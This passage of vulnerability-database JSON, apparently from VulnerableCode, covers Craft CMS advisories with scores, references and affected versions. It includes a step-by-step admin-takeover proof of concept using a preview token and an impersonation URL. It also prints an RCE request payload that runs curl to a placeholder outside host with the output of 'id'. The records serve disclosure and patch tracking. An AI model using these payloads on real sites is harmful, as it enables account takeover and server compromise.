`Component`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68455","reference_id":"","reference_type":"","scores":[{"value":"0.0114","scoring_system":"epss","scoring_elements":"0.78777","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68455"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-01-06T14:26:28Z/"}],"url":"https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04"},{"reference_url":"https://github.com/craftcms/cms/commit/27f55886098b56c00ddc53b69239c9c9192252c7","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-01-06T14:26:28Z/"}],"url":"https://github.com/craftcms/cms/commit/27f55886098b56c00ddc53b69239c9c9192252c7"},{"reference_url":"https://github.com/craftcms/cms/commit/6e608a1a5bfb36943f94f584b7548ca542a86fef","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-01-06T14:26:28Z/"}],"url":"https://github.com/craftcms/cms/commit/6e608a1a5bfb36943f94f584b7548ca542a86fef"},{"reference_url":"https://github.com/craftcms/cms/commit/ec43c497edde0b2bf2e39a119cded2e55f9fe593","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-01-06T14:26:28Z/"}],"url":"https://github.com/craftcms/cms/commit/ec43c497edde0b2bf2e39a119cded2e55f9fe593"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68455","reference_id":"CVE-2025-68455","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68455"},{"reference_url":"https://github.com/advisories/GHSA-255j-qw47-wjh5","reference_id":"GHSA-255j-qw47-wjh5","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-255j-qw47-wjh5"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5","reference_id":"GHSA-255j-qw47-wjh5","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-01-06T14:26:28Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73170?format=json","purl":"pkg:composer/craftcms/cms@4.16.17","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.16.17"},{"url":"http://public2.vulnerablecode.io/api/packages/73169?format=json","purl":"pkg:composer/craftcms/cms@5.8.21","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.21"}],"aliases":["CVE-2025-68455","GHSA-255j-qw47-wjh5"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7y4f-ef7t-47eb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90802?format=json","vulnerability_id":"VCID-83rt-3tyj-qbgx","summary":"Craft CMS Vulnerable to Privilege Escalation/Bypass through UsersController->actionImpersonateWithToken()\n### Summary\nA low-privilege user (or an unauthenticated user who has been sent a shared URL) can escalate their privileges to admin by abusing `UsersController->actionImpersonateWithToken`.\n\nAffected users should update to Craft 4.17.6 and 5.9.12 to mitigate the issue.\n\n### Details\nThis vulnerability allows any low-privilege user to escalate their privileges and become an admin, or, in extreme circumstances, unprivileged users to do the same.\n\nTherefore, this vulnerability affects Craft Pro and Team more than Craft Solo.\n\nSpecifically, an attacker who possesses a valid “preview token” can then append `&action=users/impersonate-with-token&userId=1&prevUserId=1` to the preview URL to hijack the request into the impersonation endpoint, logging in as any user (including admin) without authentication. Getting the preview token is easy, and all an editor would have to do is create a single article, click “Preview”, and then recover this token.\n\nHere’s what happens:\n\n1. The action re-dispatch in `actionPreview()` passes `$skipSpecialHandling=true` to `handleRequest()`, bypassing all security guards, and passes `$checkToken=false` to `checkIfActionRequest()`, which allows an attacker-controlled action query parameter to override the dispatch target.\n2. The `requireToken()` guard on `actionImpersonateWithToken()` only checks a boolean (`_hadToken`) that was set when the preview token was initially resolved. It does not verify that the token was intended for the impersonation action, and so any valid token from any route satisfies the check.\n3. `actionImpersonateWithToken` is listed in `$allowAnonymous` and performs no authorization beyond `requireToken()`, so no prior authentication is required.\n\n### PoC\n\nThe PoC achieves full admin takeover on the latest Craft CMS 5.9.10. Spawn a local version of Craft. Then, you’ll want to log in and create a valid setup:\n\n1. Log in at http://host:18895/admin\n2. Go to Settings,  Sections, New Section (name: \"Blog\", type: \"Channel\")\n3. Under Site Settings, set URI Format to blog/{slug}\n4. Then go to Entries, New Entry, Blog, and give it any title\n\nNext, obtain a preview token\n\n1. Open the saved entry in the editor\n2. Click the Preview button\n3. A preview pane opens with the entry rendered in an iframe\n4. Right-click inside the preview pane and Inspect Element\n5. Find the <iframe> element; its src contains the tokenized URL: `http://host:18895/blog/title?x-craft-live-preview=...&token=XXXXXXXX`\n6. Copy the `token=` value\n\nFinally, execute the exploit:\n\n  1. Open a new incognito/private browser window\n  2. Navigate to: `http://host:18895/?token=XXXXXXXX&action=users/impersonate-with-token&userId=1&prevUserId=1`\n  3. You may see a 404.  This is expected.\n\nTo verify the exploit, in the same incognito tab, navigate to `http://host:18895/admin`. You should land on the admin dashboard, logged in as admin, without ever entering credentials.\n\n### Impact\n\nPrivilege escalation; everyone is impacted.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32267","reference_id":"","reference_type":"","scores":[{"value":"0.00046","scoring_system":"epss","scoring_elements":"0.14681","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32267"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/6301e217c5f15617d939c432cb770db50af14b33","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-18T15:43:19Z/"}],"url":"https://github.com/craftcms/cms/commit/6301e217c5f15617d939c432cb770db50af14b33"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-cc7p-2j3x-x7xf","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-18T15:43:19Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-cc7p-2j3x-x7xf"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32267","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32267"},{"reference_url":"https://github.com/advisories/GHSA-cc7p-2j3x-x7xf","reference_id":"GHSA-cc7p-2j3x-x7xf","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-cc7p-2j3x-x7xf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112605?format=json","purl":"pkg:composer/craftcms/cms@4.17.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.6"},{"url":"http://public2.vulnerablecode.io/api/packages/112606?format=json","purl":"pkg:composer/craftcms/cms@5.9.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.12"}],"aliases":["CVE-2026-32267","GHSA-cc7p-2j3x-x7xf"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-83rt-3tyj-qbgx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50542?format=json","vulnerability_id":"VCID-8u2j-17a4-q7eh","summary":"Craft CMS Vulnerable to Authenticated RCE via \"craft.app.fs.write()\" in Twig Templates\nAn authenticated administrator can achieve Remote Code Execution (RCE) by injecting a Server-Side Template Injection (SSTI) payload into Twig template fields (e.g., Email Templates). By calling the `craft.app.fs.write()` method, an attacker can write a malicious PHP script to a web-accessible directory and subsequently access it via the browser to execute arbitrary system commands.\n\n---","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28697","reference_id":"","reference_type":"","scores":[{"value":"0.00208","scoring_system":"epss","scoring_elements":"0.43271","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28697"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/9dc2a4a3ec8e9cd5e8c0d1129f36371437519197","reference_id":"","reference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-04T18:02:12Z/"}],"url":"https://github.com/craftcms/cms/commit/9dc2a4a3ec8e9cd5e8c0d1129f36371437519197"},{"reference_url":"https://github.com/craftcms/cms/pull/18216","reference_id":"","reference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-04T18:02:12Z/"}],"url":"https://github.com/craftcms/cms/pull/18216"},{"reference_url":"https://github.com/craftcms/cms/pull/18219","reference_id":"","reference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-04T18:02:12Z/"}],"url":"https://github.com/craftcms/cms/pull/18219"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28697","reference_id":"CVE-2026-28697","reference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28697"},{"reference_url":"https://github.com/advisories/GHSA-v47q-jxvr-p68x","reference_id":"GHSA-v47q-jxvr-p68x","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v47q-jxvr-p68x"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-v47q-jxvr-p68x","reference_id":"GHSA-v47q-jxvr-p68x","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-04T18:02:12Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-v47q-jxvr-p68x"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73953?format=json","purl":"pkg:composer/craftcms/cms@4.17.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.0-beta.1"},{"url":"http://public2.vulnerablecode.io/api/packages/73952?format=json","purl":"pkg:composer/craftcms/cms@5.9.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.0-beta.1"}],"aliases":["CVE-2026-28697","GHSA-v47q-jxvr-p68x"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8u2j-17a4-q7eh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/95139?format=json","vulnerability_id":"VCID-9ca4-tbhq-27ad","summary":"Craft CMS has Potential Authenticated Remote Code Execution via Malicious Attached Behavior\nWe identified a vulnerability in the latest version of Craft CMS which contains an input-handling flaw in a Yii object creation path that let any authenticated user inject malicious configuration and execute arbitrary commands on the server.  Yii’s dynamic object configuration, as implemented in Craft CMS, is a feature that lets the application build parts of itself from a settings list.\n\nThis is largely a continuation of https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5, but through a different path that was not mitigated in the original.\n\nThe request-controlled condition field layouts data is converted into a live FieldLayout object without a `Component::cleanseConfig()` boundary. Because Craft configures models before `parent::__construct()`, attacker-controlled special config keys can take effect during object creation, and FieldLayout initialization then triggers a same-request event.\n\nThis appears to be another variant of the recent object-config / behavior-injection bug family, but via the condition / field layout hydration path.\n\nWe were able to reproduce the attack by issuing a POST request to `/admin/actions/element-search/search` with the following JSON from any connected user. Other routes can be exploited in the same way, including the rest of the element-indexes actions that pass through that same `beforeAction()` path. This results in a curl request to the chosen server with the result of the command “id” for the web user being appended to the path:\n\n ```\nPOST /admin/actions/element-search/search HTTP/2\nHost: hostnamehere\nCookie: CraftSessionId=...; 1234123412341234_identity=...; CRAFT_CSRF_TOKEN=...;\nContent-Length: …\nUser-Agent: Mozilla/5.0\nX-Csrf-Token: ...\nAccept: application/json\nContent-Type: application/json\n\n{\n\n  \"elementType\": \"craft\\\\elements\\\\Category\",\n  \"siteId\": 1,\n  \"search\": \"\",\n  \"condition\": {\n    \"class\": \"craft\\\\elements\\\\conditions\\\\ElementCondition\",\n    \"elementType\": \"craft\\\\elements\\\\Category\",\n    \"fieldLayouts\": [\n      {\n        \"as rce\": {\n          \"__class\": \"yii\\\\behaviors\\\\AttributeTypecastBehavior\",\n          \"__construct()\": [\n            {\n              \"attributeTypes\": {\n                \"typecastBeforeSave\": [\n                  \"Psy\\\\Readline\\\\Hoa\\\\ConsoleProcessus\",\n                  \"execute\"\n                ]\n              },\n              \"typecastBeforeSave\": \"/bin/bash -c \\\"curl [https://yourcollaboratorservergoeshere/`id`\\](https://yourcollaboratorservergoeshere/%60id%60/)\"\"\n            }\n          ]\n        },\n        \"on *\": \"self::beforeSave\"\n      }\n    ]\n  }\n}\n```\n\n## Resources\n\nhttps://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44011","reference_id":"","reference_type":"","scores":[{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.06383","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44011"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-13T15:01:05Z/"}],"url":"https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-qrgm-p9w5-rrfw","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-13T15:01:05Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-qrgm-p9w5-rrfw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44011","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44011"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5","reference_id":"GHSA-255j-qw47-wjh5","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5"},{"reference_url":"https://github.com/advisories/GHSA-qrgm-p9w5-rrfw","reference_id":"GHSA-qrgm-p9w5-rrfw","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-qrgm-p9w5-rrfw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/